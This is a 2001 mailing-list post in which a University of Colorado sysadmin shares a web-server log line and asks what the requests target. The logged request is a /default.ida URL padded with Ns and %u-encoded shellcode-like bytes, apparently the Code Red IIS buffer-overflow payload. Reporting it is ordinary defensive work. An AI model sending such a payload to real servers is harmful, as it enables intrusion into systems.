/default.ida attack?

Peter Ruprecht ruprech at jilau1.Colorado.EDU
Thu Jul 19 19:24:27 GMT 2001


Hi everyone,

Recently, I've been seeing a lot of action in my httpd logs involving
requests like:

"GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0"

Any idea what they're going after?  (Mainly the clients seem to be 
dialup or home broadband addresses.)

Thanks,
Peter

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Peter Ruprecht                  Professional Research Asst. - Computing
JILA, Room S220                 phone: (303) 492-8255
University of Colorado-Boulder  fax: (303) 492-5235
440 UCB                         email: Peter.Ruprecht at jila.colorado.edu
Boulder, CO 80309-0440          http://jilawww.colorado.edu/~ruprech




More information about the unisog mailing list